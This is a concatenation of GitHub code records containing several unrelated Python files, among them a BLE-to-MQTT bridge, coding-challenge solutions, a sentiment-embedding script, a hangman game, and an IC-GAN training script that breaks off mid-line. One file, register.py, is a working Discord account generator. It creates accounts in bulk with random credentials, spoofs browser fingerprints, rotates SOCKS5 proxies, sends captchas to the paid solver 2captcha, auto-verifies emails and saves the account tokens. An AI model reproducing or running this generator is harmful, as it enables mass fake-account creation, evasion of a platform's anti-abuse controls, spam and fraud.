self.ble_ctrl.read_next()\n except Exception as e:\n self._error(e)\n return None, None\n\n\n ###########################################################################\n ## MQTT\n\n def _on_connect(self, client, userdata, flags, 
rc):\n self._logmqtt(style(\"Connected\", Colours.FG.GREEN) \\\n + \" with result code {}\".format(rc))\n\n # client.subscribe(\"$SYS/#\")\n\n # client.message_callback_add(sub, callback)\n\n self.mqtt_connected = True\n\n def _on_disconnect(self, client, userdata, rc):\n self._logmqtt(style(\"Disconnected\", Colours.FG.RED) \\\n + \" with result code {}\".format(rc))\n\n def _on_message(self, client, userdata, msg):\n self._logmqtt(\"Received on '{0}' ({1}): {2}\".format(\n msg.topic, msg.qos,\n Bits.bytes_to_str(msg.payload)))\n\n def mqtt_connect(self, host, port=1883, lifetime=60):\n self.mqtt.on_connect = self._on_connect\n self.mqtt.on_disconnect = self._on_disconnect\n self.mqtt.on_message = self._on_message\n\n try:\n self._logmqtt(\"Trying to connect to {0}:{1}...\".format(host, port))\n self.mqtt.connect(host, port, lifetime)\n # self.mqtt_connected = True\n except Exception as e:\n self._error(e, tb=False)\n self.mqtt_connected = False\n\n def mqtt_publish(self, topic, payload, qos=0, retain=False):\n topic = self.topic(topic)\n\n self._logmqtt(\"Publishing to '{0}': {1}\".format(topic, Bits.bytes_to_str(payload)))\n self.mqtt.publish(topic, Bits.str_to_bytes(payload), qos, retain)\n\n\n ###########################################################################\n ## General\n\n def start(self):\n self.mqtt.loop_start()\n time.sleep(2) # Wait a bit for connection to complete\n\n try:\n while self.ble_connected and self.mqtt_connected:\n topic, value = self.ble_get()\n if topic and value is not None:\n self.mqtt_publish(topic, value)\n except KeyboardInterrupt:\n self.mqtt.disconnect()\n self.mqtt_connected = False\n\nif __name__ == \"__main__\":\n client = BLE2MQTT(\"Xbox Wireless Controller\")\n client.ble_connect()\n # client.mqtt_connect(\"127.0.0.1\")\n # DONT USE PUBLIC IP, OTHERWISE TELENET WILL KICK ME FROM THE INTERNET\n client.mqtt_connect(host=\"192.168.0.175\", port=1883)\n client.start()\n","repo_name":"ThenTech/NIIP-Labo","sub_path":"Lab3/Opdracht_2/BLE2MQTT/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28643750551","text":"import sys\n\n\ndef split(s):\n splits = [0]\n for i in range(len(s)):\n if s[i].isupper():\n splits.append(i)\n splits.append(-1)\n new_string = []\n for i in range(len(splits) - 1):\n new_string.append(s[splits[i]:splits[i + 1]])\n new_string[-1] += s[-1]\n return \" \".join(new_string).lower().strip()\n\n\ndef merge(s):\n new_string = \"\"\n s = s.split(\" \")\n new_string += s[0]\n for i in range(1, len(s)):\n new_string += s[i].capitalize()\n return new_string.strip()\n\n\nlines = sys.stdin.readlines()\n\nfor s in lines:\n s = s.split(\";\")\n\n if s[0] == \"S\":\n if s[1] == \"M\":\n s[2] = s[2][:-2]\n print(split(s[2]).strip())\n\n elif s[1] == \"V\":\n print(split(s[2]).strip())\n elif s[1] == \"C\":\n print(split(s[2]).strip())\n else:\n pass\n\n elif s[0] == \"C\":\n if s[1] == \"M\":\n s[2] = merge(s[2])\n s[2] = s[2].strip()\n s[2] += \"()\"\n print(s[2].strip())\n elif s[1] == \"V\":\n s[2] = merge(s[2])\n print(s[2].strip())\n elif s[1] == \"C\":\n s[2] = merge(s[2])\n print((s[2][0].upper() + s[2][1:]).strip())\n else:\n pass\n","repo_name":"flyinthunder/HackerRank","sub_path":"Interview Prep Kit/Week 1/Challenge 5 - Camel Case 4.py","file_name":"Challenge 5 - Camel Case 
4.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13779504631","text":"import random\nimport requests\nimport json\nimport time\nimport base64\nimport quopri\nimport os\n\ndomain = \"domain.de\"\ncaptcha_key = \"key\"\nrequest_timeout = 500\n\n\n\nmail_dic = \"mails\"\ntoken_file = \"tokens.txt\"\n\ndef get_fingerprint(user_agent):\n headers_fingerprint = {\n \"Referer\": \"https://discord.com/register\",\n \"User-Agent\": user_agent\n }\n\n fingerprint = requests.get(url=\"https://discord.com/api/v9/experiments\", headers=headers_fingerprint)\n\n return fingerprint.json()[\"fingerprint\"]\n\ndef randomUserAgent():\n # Do\n return \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36\"\n\ndef randomSuperProperties(user_agent):\n s = \"{\\\"os\\\":\\\"Windows\\\",\\\"browser\\\":\\\"Chrome\\\",\\\"device\\\":\\\"\\\",\\\"system_locale\\\":\\\"en-US\\\",\\\"browser_user_agent\\\":\\\"\" + user_agent + \"\\\",\\\"browser_version\\\":\\\"109.0.5414.120\\\",\\\"os_version\\\":\\\"10\\\",\\\"referrer\\\":\\\"\\\",\\\"referring_domain\\\":\\\"\\\",\\\"referrer_current\\\":\\\"\\\",\\\"referring_domain_current\\\":\\\"\\\",\\\"release_channel\\\":\\\"stable\\\",\\\"client_build_number\\\":9999,\\\"client_event_source\\\":null}\"\n\n return base64.b64encode(s.encode(\"ascii\")).decode(\"ascii\")\n\ndef randomPassword():\n return ''.join(random.choice(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\") for i in range(10)) + '!'\n\ndef randomName():\n return ''.join(random.choice(\"abcdefghijklmnopqrstuvwxyz\") for i in range(8))\n\ndef randomBirthDay():\n t = \"\"\n r = \"\"\n r += str(random.randrange(1990, 2000))\n r += \"-\"\n t = str(random.randrange(1, 12))\n if len(t) == 1:\n t = \"0\" + t\n r += t\n r += \"-\"\n t = str(random.randrange(1, 30))\n if len(t) == 1:\n t = \"0\" + t\n r += t\n return r\n\nproxies_socks5 = []\nproxies_http = []\n\ndef load_proxies_http():\n global proxies_http\n\n file = open(\"proxies/http.txt\")\n for line in file:\n line = line.replace(\"\\n\", \"\")\n #if \":\" in line:\n # host = line.split(\":\")[0]\n # port = line.split(\":\")[1]\n #\n # proxies[host] = port\n\n proxies_http.append(line)\n\ndef load_proxies_socks5():\n global proxies_socks5\n\n file = open(\"proxies/socks5.txt\")\n for line in file:\n line = line.replace(\"\\n\", \"\")\n #if \":\" in line:\n # host = line.split(\":\")[0]\n # port = line.split(\":\")[1]\n #\n # proxies[host] = port\n\n proxies_socks5.append(line)\n\ndef randomProxy(type):\n global proxies_http\n\n if \"SOCKS5\" == type:\n return \"SOCKS5\", random.choice(proxies_socks5)\n if \"HTTP\" == type:\n return \"HTTP\", random.choice(proxies_http)\n\ndef solve_captcha(ss, proxy_type, proxy, pageurl):\n time.sleep(3)\n\n res_cap_submit = requests.get(url=\"http://2captcha.com/in.php?key=\" + captcha_key + \"&method=hcaptcha&sitekey=\" + ss + \"&proxytype=\" + proxy_type + \"&proxy=\" + proxy + \"&pageurl=\" + pageurl)\n if \"|\" not in res_cap_submit.text:\n print(\"ERROR 2captcha in.php: \" + res_cap_submit.text)\n \n id = res_cap_submit.text.split(\"|\")[1]\n\n while True:\n time.sleep(5)\n\n res_cap_get = requests.get(url=\"http://2captcha.com/res.php?key=\" + captcha_key + \"&action=get&id=\" + id)\n if res_cap_get.text != \"CAPCHA_NOT_READY\":\n break\n\n print(res_cap_get.text[:64])\n\n if \"ERROR\" in res_cap_get.text.upper():\n return 
\"\"\n\n return res_cap_get.text.split(\"|\")[1]\n\ndef register():\n\n password = randomPassword()\n birth_day = randomBirthDay()\n name = randomName()\n email = name + \"@\" + domain\n \n user_agent = randomUserAgent()\n fingerprint = get_fingerprint(user_agent)\n\n super_properties = randomSuperProperties(user_agent)\n\n proxy_type, proxy = randomProxy(\"SOCKS5\")\n\n proxy_use = dict(\n http=proxy_type.lower() + '://' + proxy,\n https=proxy_type.lower() + '://' + proxy\n )\n\n print(\"Data \" + email + \" \" + name + \" \" + password + \" \" + birth_day)\n\n data_try = {\n \"X-Super-Properties\": super_properties,\n \"fingerprint\": fingerprint,\n \"email\": email,\n \"username\": name,\n \"password\": password,\n \"invite\": \"null\",\n \"consent\": \"true\",\n \"date_of_birth\": birth_day,\n \"gift_code_sku_id\": \"null\",\n \"captcha_key\": \"null\",\n \"promotional_email_opt_in\": \"false\"\n }\n\n headers_try = {\n \"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n #\"Content-Length\": str(len(data)),\n \"User-Agent\": user_agent\n }\n\n res_try = requests.post(url=\"https://discord.com/api/v9/auth/register\", json=data_try, headers=headers_try, proxies=proxy_use, timeout=request_timeout)\n \n if \"retry_after\" in res_try.text:\n print(\"Wait before try again \" + str(res_try.json()[\"retry_after\"]))\n return\n\n token = \"\"\n\n j = res_try.json()\n\n if \"captcha_sitekey\" in res_try.text:\n site_key = j[\"captcha_sitekey\"]\n\n while True:\n \n print(\"Submit cap\")\n key = solve_captcha(site_key, proxy_type, proxy, \"https://discord.com/api/v9/auth/register\")\n\n if key == \"\":\n return\n\n\n data_reg = {\n \"fingerprint\": fingerprint,\n \"email\": email,\n \"username\": name,\n \"password\": password,\n \"invite\": \"null\",\n \"consent\": \"true\",\n \"date_of_birth\": birth_day,\n \"gift_code_sku_id\": \"null\",\n \"captcha_key\": key,\n \"promotional_email_opt_in\": \"false\"\n }\n\n headers_reg = {\n \"X-Super-Properties\": super_properties,\n \"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n \"Content-Length\": str(len(str(data_reg))),\n \"User-Agent\": user_agent,\n \"X-Fingerprint\": fingerprint,\n \"X-Debug-Options\": \"bugReporterEnabled\",\n \"Sec-Ch-Ua-Mobile\": \"?0\",\n \"X-Discord-Locale\": \"en-US\",\n \"Sec-Ch-Ua\": \"\\\"Chromium\\\";v=\\\"109\\\", \\\"Not_A Brand\\\";v=\\\"99\\\"\",\n \"Sec-Ch-Ua-Platform\": \"Linux\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Origin\": \"https://discord.com\"\n }\n\n res_reg = requests.post(url=\"https://discord.com/api/v9/auth/register\", json=data_reg, headers=headers_reg, proxies=proxy_use, timeout=request_timeout)\n #res_reg = requests.post(url=\"http://localhost:8888/api/v9/auth/register\", json=data_reg, headers=headers_reg)\n\n #print(res_reg.text)\n \n if \"captcha_sitekey\" in res_reg.text:\n site_key = res_reg.json()[\"captcha_sitekey\"]\n else:\n token = res_reg.json()[\"token\"]\n break\n\n elif \"token\" in j:\n token = j[\"token\"]\n\n if token != \"\":\n file = open(\"tokens.txt\", \"a\")\n file.write(token)\n file.write(\"###\")\n file.write(email)\n file.write(\"###\")\n file.write(name)\n file.write(\"###\")\n file.write(password)\n file.write(\"###\")\n file.write(birth_day)\n file.write(\"###\")\n file.write(super_properties)\n file.write(\"###\")\n file.write(fingerprint)\n file.write(\"###\")\n file.write(user_agent)\n file.write(\"###\")\n 
file.write(proxy)\n file.write(\"###\")\n file.write(proxy_type)\n\n file.write(\"\\n\")\n file.close()\n else:\n print(\"ERROR token gen\")\n\n #print(len(data))\n\ndef verfiy_email():\n for file in os.listdir(mail_dic):\n file_name = mail_dic + \"/\" + file\n dec = base64.b64decode(file.encode('ascii')).decode('ascii')\n if \" \" in dec:\n dec = dec.split(\" \")[1]\n\n email = dec\n \n s = \"\"\n a = False\n\n f = open(file_name, \"r\")\n for line in f:\n if \"--\" in line and not a:\n a = True\n elif \"--\" in line and a:\n a = False\n if \"https\" in s and \"discord\" in s:\n break\n s = \"\"\n\n if a:\n s += line\n \n s = s[s.index(\"https\"):]\n \n if \"\\\"\" in s:\n s = s[0:s.index('\\\"')]\n\n decoded = quopri.decodestring(s.encode('utf-8')).decode('utf-8').replace(\"\\n\", \"\")\n\n tokens = open(token_file)\n for line in tokens:\n if \"###\" in line:\n if line.split(\"###\")[1] in email:\n line = line[0:line.index('\\n')]\n\n super_properties = line.split(\"###\")[5]\n fingerprint = line.split(\"###\")[6]\n user_agent = line.split(\"###\")[7]\n proxy = line.split(\"###\")[8]\n proxy_type = line.split(\"###\")[9]\n\n #proxy_type = proxy_type[0:proxy_type.index('\\n')]\n\n #print(proxy)\n #print(proxy_type)\n\n proxy_use = dict(\n http=proxy_type.lower() + '://' + proxy,\n https=proxy_type.lower() + '://' + proxy\n )\n\n headers = {\n \"User-Agent\": user_agent\n }\n\n res = requests.get(url=decoded, headers=headers, proxies=proxy_use, allow_redirects=False)\n \n loc = res.headers[\"Location\"]\n\n token = loc.split(\"=\")[1]\n\n print(token)\n\n data_try = {\n \"token\": token,\n \"captcha_key\": \"null\"\n }\n\n headers_try = {\n \"X-Fingerprint\": fingerprint,\n \"X-Super-Properties\": super_properties,\n #\"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n #\"Content-Length\": str(len(data)),\n \"User-Agent\": user_agent\n }\n\n res_try = requests.post(url=\"https://discord.com/api/v9/auth/verify\", json=data_try, headers=headers_try, proxies=proxy_use, timeout=request_timeout)\n \n if \"retry_after\" in res_try.text:\n print(\"Wait before try again \" + str(res_try.json()[\"retry_after\"]))\n return\n\n user_id = \"\"\n new_token = \"\"\n\n j = res_try.json()\n\n if \"captcha_sitekey\" in res_try.text:\n site_key = j[\"captcha_sitekey\"]\n\n while True:\n \n print(\"Submit cap\")\n key = solve_captcha(site_key, proxy_type, proxy, \"https://discord.com/api/v9/auth/verify\")\n\n if key == \"\":\n return\n\n data_reg = {\n \"token\": token,\n \"captcha_key\": key\n }\n\n headers_reg = {\n \"X-Fingerprint\": fingerprint,\n \"X-Super-Properties\": super_properties,\n #\"Referer\": \"https://discord.com/register\",\n \"Content-Type\": \"application/json\",\n #\"Content-Length\": str(len(data)),\n \"User-Agent\": user_agent\n }\n\n res_reg = requests.post(url=\"https://discord.com/api/v9/auth/verify\", json=data_reg, headers=headers_reg, proxies=proxy_use, timeout=request_timeout)\n \n\n \n if \"captcha_sitekey\" in res_reg.text:\n site_key = res_reg.json()[\"captcha_sitekey\"]\n else:\n user_id = res_reg.json()[\"user_id\"]\n new_token = res_reg.json()[\"token\"]\n break\n\n elif \"user_id\" in j:\n user_id = j[\"user_id\"]\n new_token = j[\"token\"]\n\n line = new_token + \"###\" + line + \"###\" + user_id\n\n file = open(\"verify_email.txt\", \"a\")\n file.write(line)\n file.write(\"\\n\")\n file.close()\n \ndef verify_number():\n file = open(\"verify_email.txt\")\n\n for line in file:\n if \"###\" in line:\n line = 
line[0:line.index('\\n')]\n #super_properties = line.split(\"###\")[5]\n #fingerprint = line.split(\"###\")[6]\n \n token = line.split(\"###\")[0]\n user_agent = line.split(\"###\")[8]\n proxy = line.split(\"###\")[9]\n proxy_type = line.split(\"###\")[10]\n\n #proxy_type = proxy_type[0:proxy_type.index('\\n')]\n\n #print(proxy)\n #print(proxy_type)\n\n proxy_use = dict(\n http=proxy_type.lower() + '://' + proxy,\n https=proxy_type.lower() + '://' + proxy\n )\n\n headers = {\n \"User-Agent\": user_agent,\n \"Authorization\": token\n }\n\n res = requests.get(url=\"https://discord.com/api/v9/users/@me/affinities/users\", headers=headers, proxies=proxy_use)\n\n if \"verify your account\" in res.text:\n print(\"F\")\n\n\n\n\nload_proxies_socks5()\n\n#print(randomProxy(\"http\"))\n#print(randomProp(\"w\"))\n\n#register()\n\n\n#print(get_fingerprint(randomUserAgent()))\n\n#verfiy_email()\n\nverify_number()\n","repo_name":"paupriv/discord","sub_path":"accout_generator/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":13894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1377980638","text":"\"\"\"\nDay 1: Advent of Code\n\"\"\"\n\n\ndef read_input(path: str) -> list:\n out = []\n with open(path, 'r') as file:\n line = file.readline()\n while line != '':\n out.append(int(line))\n line = file.readline()\n return out\n\n\ndef solve_for_two(input: list) -> int:\n my_set = set()\n for val in input:\n partner = 2020 - val\n\n if partner in my_set:\n return partner * val\n my_set.add(val)\n return -1\n\n\ndef solve_for_three(input: list) -> int:\n available_nums = set(input)\n processed = set()\n\n for i in range(len(input)):\n for j in range(i + 1, len(input)):\n val1 = input[i]\n val2 = input[j]\n\n missing = 2020 - val1 - val2\n\n if missing in available_nums:\n return missing * val1 * val2\n\n return -1\n\n\nif __name__ == '__main__':\n path = '/Users/danielgrittner/development/advent-of-code2020/day1/input.txt'\n input = read_input(path)\n print(solve_for_two(input))\n \n path2 = '/Users/danielgrittner/development/advent-of-code2020/day1/input2.txt'\n input2 = read_input(path2)\n print(solve_for_three(input2))\n","repo_name":"danielgrittner/advent-of-code2020","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70829999823","text":"# -*- coding: utf-8 -*-\n\n#Import necessary modules\n\nimport pickle\nfrom pypeaks import Data, Intervals\n\n#Load data\n#We already have provided some data samples and a script in examples/ directory. \n#If you don't have it, you can either load your own data, or download them from \n#https://github.com/gopalkoduri/pypeaks\n\ndata = pickle.load(open(\"../examples/sample-histogram.pickle\"))\nhist = Data(data[0], data[1])\n\n#Get peaks by slope method and plot them\n\nhist.get_peaks(method='slope')\nhist.plot()\n\n#Get peaks by interval method and plot them\n\n#In the example/ folder, there is a pickle file with some example intervals, \n#in this case, just-intonation intervals for music. They can refer to any intervals!\nji_intervals = pickle.load(open('../examples/ji-intervals.pickle'))\nji_intervals = Intervals(ji_intervals)\n\nhist.get_peaks(method='interval', intervals=ji_intervals)\nhist.plot(intervals=ji_intervals.intervals)\n\n#Accessing the peaks data\n#The Data object has x, y_raw, y, smoothness and peaks variables available. 
\n#The help functions shows the methods available for it:\n#try help(Data) in a python/ipython interpreter\n\n","repo_name":"gopalkoduri/pypeaks","sub_path":"pypeaks/examples/howto.py","file_name":"howto.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"47"} +{"seq_id":"25860375415","text":"import datetime\nimport json\nimport logging as lg\nfrom multiprocessing import Pool\n# from multiprocessing.shared_memory import SharedMemory\nfrom multiprocessing.managers import SharedMemoryManager\n\nimport numpy as np\nimport yaml\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\nfrom utils.multiset import MultiSet\n\n# noinspection PyUnresolvedReferences\n\nanalyser = SentimentIntensityAnalyzer()\n\nctd = None\nshape_val = None\nshape_id = None\n\n\ndef embed_line(line, n, contig_t_d, contig_t_embed, contig_val, contig_id):\n try:\n if line == '':\n return (-1, None, [])\n contig_t_embed_local = np.ndarray((600000, 4), dtype=np.float, buffer=contig_t_embed.buf)\n contig_t_d_local = np.ndarray((600000,), dtype=np.float, buffer=contig_t_d.buf)\n jline = json.loads(line)\n datestr = jline['date']['$date']\n datet = datetime.datetime.strptime(datestr, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n id = int(jline['id'])\n content = jline['content']\n date = datet.date()\n sent = analyser.polarity_scores(content)\n arr = [sent['neg'], sent['neu'], sent['pos'], sent['compound']]\n nparr = np.array(arr)\n contig_t_embed_local[n]=nparr\n contig_t_d_local[n]=datet.toordinal()\n n_date = np.datetime64(date)\n\n return id, n_date, arr\n except Exception as e:\n lg.error(str(e))\n raise e\n\n\nif __name__ == '__main__':\n import time\n\n start_time = time.time()\n\n # {\"_id\":{\"$oid\":\"5d7041dcd6c2261839ecf58f\"},\"username\":\"computer_hware\",\"date\":{\n # \"$date\":\"2016-04-12T17:10:12.000Z\"},\"retweets\":0,\"favorites\":0,\"content\":\"#Apple iPhone SE release date, price,\n # specs and features: iPhone SE users report Bluetooth ... 
Read more: http://owler.us/aayzDR $ AAPL\",\"geo\":\"\",\n # \"mentions\":\"\",\"hashtags\":\"#Apple\",\"replyTo\":\"\",\"id\":\"719905464880726018\",\n # \"permalink\":\"https://twitter.com/computer_hware/status/719905464880726018\"}\n with open('../resources/preferences.yaml') as f:\n prefs = yaml.load(f, Loader=yaml.FullLoader)\n\n multiset = MultiSet(prefs)\n\n with SharedMemoryManager() as smm:\n contig_ids = multiset.contig_ids\n # noinspection PyUnresolvedReferences\n contig_t_embed = smm.SharedMemory(size=np.empty((600000, 4)).nbytes)\n contig_t_d = smm.SharedMemory(size=np.empty((600000, 4), dtype='int64').nbytes)\n\n contig_t_val = smm.SharedMemory(size=multiset.contig_vals.nbytes)\n ctval_shp = multiset.contig_vals.shape\n ctval_np = np.ndarray(ctval_shp, buffer=contig_t_val)\n np.copyto(ctval_np, contig_t_val)\n contig_id_shared = smm.SharedMemory(contig_ids.nbytes)\n ctid__id_shp = contig_ids.shape\n ctid_np = np.ndarray(shape=ctid__id_shp, buffer=contig_id_shared)\n np.copyto(contig_id_shared, ctid_np)\n # check if we are running in text/image pair only\n lg.info(\"starting json processing in combined mode\")\n start_date = datetime.date(2011, 12, 29)\n end_date = datetime.date(2019, 9, 20)\n delta = end_date - start_date\n\n date_arr = [start_date + datetime.timedelta(days=i) for i in range(delta.days + 1)]\n\n date_arr_np = np.array([np.datetime64(d) for d in date_arr])\n\n boolarr = np.zeros(date_arr_np.shape, dtype=np.bool_)\n n_tweets = 0\n n_fail = 0\n skipped = 0\n n_t_tweets = 0\n batch = 500\n n_procs = 10\n with open(prefs['jsonfile'], \"r\", encoding=\"utf-8\") as file:\n with Pool(n_procs) as embed_pool:\n lines = [(file.readline(), n_t_tweets + a, contig_t_d, contig_t_embed, contig_t_val, contig_id_shared)\n for a in range(batch)]\n # lines = [file.readline() for a in range(batch)]\n # ctd_s = [contig_t_d for a in range(batch)]\n # cte_s = [contig_t_embed for a in range(batch)]\n # n = range(n_t_tweets,n_t_tweets+batch)\n # locs = range(n_t_tweets,n_t_tweets + batch)\n while lines[-1][0]:\n try:\n # results = embed_pool.uimap(embed_line,lines,n,ctd_s,cte_s)\n results = embed_pool.imap_unordered(embed_line,lines)\n for id, n_date, arr in results:\n # loc = contig_ids.searchsorted(id)\n # if loc < contig_ids.shape[0] and id == contig_ids[loc]:\n # multiset.contig_vals[loc, 24:] = arr\n # multiset.contig_dates[loc] = n_date\n # boolarr[np.argwhere(date_arr_np == n_date)] = True\n n_t_tweets += 1\n\n n_tweets += 1\n except Exception as e:\n lg.error(e)\n n_fail += 1\n raise e\n finally:\n lines = [(file.readline(), n_t_tweets + a, contig_t_d, contig_t_embed) for a in range(batch)]\n # lines = [file.readline() for a in range(batch)]\n # ctd_s = [contig_t_d for a in range(batch)]\n # cte_s = [contig_t_embed for a in range(batch)]\n # n = range(n_t_tweets, n_t_tweets + batch)\n if n_t_tweets >= 100000:\n print(time.time() - start_time)\n print(n_t_tweets)\n\n break\n\n\n # dates = date_arr_np.shape[0]\n # pos_inds = np.argwhere(boolarr).squeeze()\n # date_arr_np = date_arr_np[pos_inds]\n # n_null = dates - date_arr_np.shape[0]\n # lg.info(\"collected %s tweets with %s errors\", n_tweets, n_fail)\n # lg.info(\"collected tweets on %s dates\", (delta.days - n_null))\n # lg.info(\"deleted %s dates\", n_null)\n print(time.time()-start_time)\n ctd = 
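Note on the textembed_multi.py record above: it builds NumPy views over SharedMemoryManager blocks, but appears to pass the SharedMemory handle itself where the .buf memoryview is needed (e.g. np.ndarray(ctval_shp, buffer=contig_t_val) and np.copyto(ctval_np, contig_t_val)), and np.float is a deprecated alias. A minimal self-contained sketch of the intended pattern, with illustrative shapes and dtype that are not taken from the record:

    # Minimal sketch of the SharedMemoryManager + NumPy-view pattern used in the
    # textembed_multi.py record above. Shape and dtype here are assumptions.
    import numpy as np
    from multiprocessing.managers import SharedMemoryManager

    with SharedMemoryManager() as smm:
        src = np.arange(12, dtype=np.float64).reshape(3, 4)
        shm = smm.SharedMemory(size=src.nbytes)                         # raw shared block
        view = np.ndarray(src.shape, dtype=src.dtype, buffer=shm.buf)   # view over shm.buf, not shm
        np.copyto(view, src)                                            # copy array -> view, not the handle
        assert view[2, 3] == 11.0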
np.ndarray((600000,4),np.float,buffer=contig_t_embed.buf)\n","repo_name":"arthurdecloedt/thesis","sub_path":"scripts/textembed_multi.py","file_name":"textembed_multi.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37449928296","text":"# Jumper Game (Generic Brand of 'Hangman')\n# Team 10 \n# 5/19/2022\n\nimport random\n\n# J'DEE\n# The puzzle is a secret word randomly chosen from a list.\n# # Words Class\nclass Words:\n \"\"\" The responsibility of this class is to generate and randomly pick from a list of words.\n \n Attributes: words: an array of words to choose from\n puzzle_word: the chosen word for the game\n \"\"\"\n def __init__(self):\n self.puzzle_word = \"\"\n# # # Methods\n# # # # set_word(self)\n def set_word(self):\n \"\"\"generates the puzzle word from the words array, and sets the value of the puzzle word to the selected word.\n \n Arguments: self: an insance of words.\"\"\"\n words = [\"boots\", \"clats\", \"gamet\", \"plant\", \"water\"]\n self.puzzle_word = random.choice(words)\n return self.puzzle_word\n \n \n\n\n \n# NATE\n# Letters Class\nclass Letters():\n# # init\n def __init__(self):\n# # # Attibutes\n self.letters_array = []\n self.user_choice = \"\"\n self.already_guessed = False\n\n# Methods\n# # # remove_letters(self)\n\n def add_letters(self):\n self.user_choice = input(\"Choose a letter: \")\n for i in self.letters_array:\n if i == self.user_choice:\n print(\"You already guessed this. Try again.\")\n self.already_guessed = True\n return self.already_guessed\n else:\n self.already_guessed = False\n self.letters_array.append(self.user_choice)\n return self.already_guessed\n\n# # JEREMY\n# # # Rules Class\nclass Game():\n# # init\n def __init__(self):\n self.num_wrong = 0\n self.winner = False\n self.answer_array = [\" _ \", \" _ \", \" _ \", \" _ \", \" _ \"]\n \n def play_round(self):\n game_letter = Letters()\n game_word = Words()\n term_serv = TerminalService()\n letters = \"\"\n term_serv.display()\n puzzle_array = game_word.set_word()\n for i in game_letter.letters_array:\n letters += i\n while term_serv.num_wrong != 5:\n while self.winner != True:\n game_letter.add_letters()\n for i in puzzle_array:\n if (game_letter.user_choice == i):\n print(\"Super Duper!\")\n place = puzzle_array.index(i)\n self.answer_array[place] = i\n right_answer = True\n break\n else:\n right_answer = False\n if game_letter.already_guessed == False:\n letters += game_letter.user_choice\n if right_answer == False:\n term_serv.num_wrong += 1\n term_serv.remove_chute() \n print(\" \")\n print(game_play.answer_array[0], game_play.answer_array[1], game_play.answer_array[2],game_play.answer_array[3],game_play.answer_array[4])\n print(\" \")\n print(f'\\nNumber of wrong guesses: {term_serv.num_wrong}\\n')\n term_serv.display()\n print(\" \")\n print(f'letters you have guessed: {letters}\\n')\n print(\"\")\n print(\"That's too many wrong. 
I'm sorry, your jumper's parachute stopped functioning, and now they are dead.\")\n \n\n\n\nclass TerminalService:\n def __init__(self):\n #Separated each step into a picture which will disappear when there is a mistake.\n self._first_mistake = \" ___\"\n self._second_mistake = \" /___\\ \"\n #The third mistake is actually just the second line without the / and \\.\n self._third_mistake = \" ___\"\n self._fourth_mistake = \" \\ /\"\n self._fifth_mistake = \" \\ /\"\n self._guy = \" o\\n /|\\ \\n / \\ \"\n #Dead guy is used at the very end to represent a loss.\n self._dead_guy = \" x\\n /|\\ \\n / \\ \"\n #Decided to combine all of the different pictures into an array so I could print it easier.\n self._whole_picture = [self._first_mistake, self._second_mistake, self._fourth_mistake, self._fifth_mistake, self._guy]\n self.num_wrong = 0\n \n #display function uses if statements to change the array and then displays it \n def remove_chute(self):\n if (self.num_wrong == 1) | (self.num_wrong == 3) | (self.num_wrong == 4):\n self._whole_picture.remove(self._whole_picture[0])\n elif self.num_wrong == 2:\n #replaces second_mistake with third_mistake\n self._whole_picture[0] = self._third_mistake\n elif self.num_wrong == 5:\n self._whole_picture.remove(self._whole_picture[0])\n self._whole_picture[0] = self._dead_guy\n elif self.num_wrong <=0:\n self._whole_picture = self._whole_picture\n return self._whole_picture\n\n def display(self):\n print(*self._whole_picture, sep='\\n')\n \n\n \n def rules(self):\n pass\n \ngame_play = Game()\ngame_play.play_round()\n\n\n\n","repo_name":"natebc72/Team-10-Repo","sub_path":"jumper_jer.py","file_name":"jumper_jer.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13797775116","text":"import sys\nimport os\n\nsys.path.insert(1, os.path.join(sys.path[0], \"..\"))\nimport click\nimport re\nimport json\nimport tempfile\nimport torch\nimport dnnlib\n\nimport numpy as np\n\nimport parser\n\nfrom training import training_loop\nfrom metrics import metric_main\nfrom torch_utils import training_stats\nfrom torch_utils import custom_ops\n\n\n# ----------------------------------------------------------------------------\n\n\nclass UserError(Exception):\n pass\n\n\n# ----------------------------------------------------------------------------\n\n\ndef setup_training_loop_kwargs(\n # General options (not included in desc).\n exp_name=None, # Experiment name\n slurm=None, # Using SLURM or not \n gpus=None, # Number of GPUs: , default = 1 gpu\n nodes=None, # Number of nodes: , default = 1 node\n snap=None, # Snapshot interval: , default = 50 ticks\n metrics=None, # List of metric names: [], ['fid50k_full'] (default), ...\n seed=None, # Random seed: , default = 0\n # Dataset.\n data=None, # Training dataset (required): \n class_cond=None, # Conditioning on a class label \n subset=None, # Train with only N images: , default = all\n mirror=None, # Augment dataset with x-flips: , default = False\n # IC-GAN dataset parameters.\n instance_cond=None, # Conditioning on instance features \n feature_augmentation=None, # Horizontal flips augmentation to extract instance features \n root_feats=None, # Path where to find the hdf5 file with the instance features \n root_nns=None, # Path where to find the pre-computed nearest neighbors for each instance \n label_dim=None, # Dimensionality of the class embeddings if we use class conditonings .\n # Base config.\n cfg=None, # Base config: 
